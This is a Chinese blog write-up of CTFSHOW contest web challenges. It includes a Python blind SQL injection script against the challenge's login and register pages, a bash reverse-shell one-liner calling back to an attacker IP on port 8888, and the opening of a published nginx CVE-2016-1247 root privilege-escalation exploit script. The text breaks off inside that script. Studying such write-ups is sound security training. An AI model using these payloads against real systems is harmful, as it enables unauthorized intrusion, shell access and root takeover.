CTFSHOW 内部赛web writeup

最新推荐文章于 2024-04-20 01:01:50 发布

AshMOB

最新推荐文章于 2024-04-20 01:01:50 发布

阅读量5k

点赞数

分类专栏： ctf比赛wp 文章标签： web 安全

本文链接：https://blog.csdn.net/ashmob/article/details/121044296

版权

本文详细介绍了CTFSHOW内部赛中涉及的Web安全挑战，包括SQL盲注、权限提升、Flask应用session篡改、WordPress漏洞利用等。通过跟随师傅们的writeup，作者复现了攻击过程，最终获取flag。挑战涵盖了多种安全知识点，如SQL注入、系统提权、Cookie篡改等。

摘要由CSDN通过智能技术生成

CTFSHOW 内部赛web writeup

太菜了不会写，按着羽师傅和bmth666师傅的writeup复现

签到

打开界面如上，右键源码可以看到有一个register.php注册界面，需要利用login和register界面来进行sql盲注，sql太菜了连代码都看不懂，直接贴师傅们写的脚本

import requests
import re

url1 = "http://dd2ae20d-7588-4d04-af33-86ce7a48313d.challenge.ctf.show/register.php"
url2 = "http://dd2ae20d-7588-4d04-af33-86ce7a48313d.challenge.ctf.show/login.php"
flag = ''
for i in range(1, 50):
    payload = "hex(hex(substr((select/**/flag/**/from/**/flag)from/**/" + str(i) + "/**/for/**/1))),/*"
    print(payload)
    s = requests.session()
    data1 = {
   
        'e': str(i + 30) + "',username=" + payload,
        'u': "*/#",
        'p': i + 30
    }
    # print(data1['e'])
    r1 = s.post(url1, data=data1)
    data2 = {
   
        'e': i + 30,
        'p': i + 30
    }
    r2 = s.post(url2, data=data2)
    t = r2.text
    real = re.findall("Hello (.*?),", t)[0]
    flag += real
    print(flag)

运行到异常结束

然后将得到的这行十六进制数转两次文本即可得到flag

出题人不想跟你说话.jpg

这题进去的界面是这样的

菜刀暗示了需要利用菜刀或别的工具链接后门，密码在

上

hint1: whoami && ls -l /
hint2:如你们所说，提权，看看服务器有什么服务

读取flag的权限不足

cat /etc/crontab发现有定时任务

nginx -v查看nginx的版本，可能存在提权漏洞CVE-2016-1247

受影响的版本如下：

尝试反弹shell到自己的机子上

nc -lvnp 8888 #自己的机子监听8888端口

bash -i >& /dev/tcp/xx.xx.xx.xx/8888 0>&1 #xx表示你的ip地址，公网ip

如果你的机子在阿里云或者azure需要注意修改安全组策略，不然接收不到反弹shell

上传Nginx.sh

内容为

------------[ nginxed-root.sh ]--------------

#!/bin/bash
#
# Nginx (Debian-based distros) - Root Privilege Escalation PoC Exploit
# nginxed-root.sh (ver. 1.0)
#
# CVE-2016-1247
#
# Discovered and coded by:
#
# Dawid Golunski
# dawid[at]legalhackers.com
#
# https://legalhackers.com
#
# Follow https://twitter.com/dawid_golunski for updates on this advisory.
#
# ---
# This PoC exploit allows local attackers on Debian-based systems (Debian, Ubuntu
# etc.) to escalate their privileges from nginx web server user (www-data) to root 
# through unsafe error log handling.
#
# The exploit waits for Nginx server to be restarted or receive a USR1 signal.
# On Debian-based systems the USR1 signal is sent by logrotate (/etc/logrotate.d/nginx)
# script which is called daily by the cron.daily on default installations.
# The restart should take place at 6:25am which is when cron.daily executes.
# Attackers can therefore get a root shell automatically in 24h at most without any admin
# interaction just by letting the exploit run till 6:25am assuming that daily logrotation 
# has been configured. 
#
#
# Exploit usage:
# ./nginxed-root.sh path_to_nginx_error.log 
#
# To trigger logrotation for testing the exploit, you can run the following command:
#
# /usr/sbin/logrotate -vf /etc/logrotate.d/nginx
#
# See the full advisory for details at:
# https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html
#
# Video PoC:
# https://legalhackers.com/videos/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html
#
#
# Disclaimer:
# For testing purposes only. Do no harm.
#

BACKDOORSH="/bin/bash"
BACKDOORPATH="/tmp/nginxrootsh"
PRIVESCLIB="/tmp/privesclib.so"
PRIVESCSRC="/tmp/privesclib.c"
SUIDBIN="/usr/bin/sudo"

function cleanexit {
   
    # Cleanup 
    echo -e "\n[+] Cleaning up..."
    rm -f $PRIVESCSRC
    rm -f $PRIVESCLIB
    rm -f $ERRORLOG
    touch $ERRORLOG
    if [ -f /etc/ld.so.preload ]; then
        echo -n > /etc/ld.so.preload
    fi
    echo -e "\n[+] Job done. Exiting with code $1 \n"
    exit $1
}

function ctrl_c() {
   
        echo -e "\n[+] Ctrl+C pressed"
    cleanexit 0
}

#intro 

cat <<_eascii_
 _______________________________
< Is your server (N)jinxed ? ;o >
 -------------------------------
           \ 
            \          __---__
                    _-       /--______
               __--( /     \ )XXXXXXXXXXX